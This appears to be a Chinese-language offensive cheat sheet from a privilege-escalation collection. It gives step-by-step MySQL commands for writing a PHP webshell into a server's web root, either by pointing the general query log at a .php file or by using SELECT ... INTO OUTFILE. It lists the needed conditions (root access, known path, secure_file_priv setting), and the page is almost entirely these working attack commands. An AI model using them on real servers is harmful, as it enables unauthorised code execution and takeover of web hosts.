首页 提权合集

mysql日志获取webshell

查看:SHOW VARIABLES LIKE '%general%'

修改状态:set global general_log="ON";

修改储存位置:set global general_log_file='C:/phpStudy/PHPTutorial/WWW/11.php';

写马:select '<?php phpinfo(); ?>';

只需root权限即可

mysql outfile导出webshell

条件:知道物理路径,root权限,同时mysql需要有write权限,secure_file_priv配置不为null,查看方法:

show global variables like '%secure_file_priv%';

这个参数只能通过修改配置文件后重启mysql修改。

1.select '<?php phpinfo();?>' into outfile 'C:phpStudy/PHPTutorial/WWW/xx.php'

2.新建一个表,创建一个空字段,在这个字段里插入php马,再导出

直接导出需要开启安全配置
secure_file_priv参数用于限制LOAD DATA, SELECT …OUTFILE, LOAD_FILE()(读取文件)



目录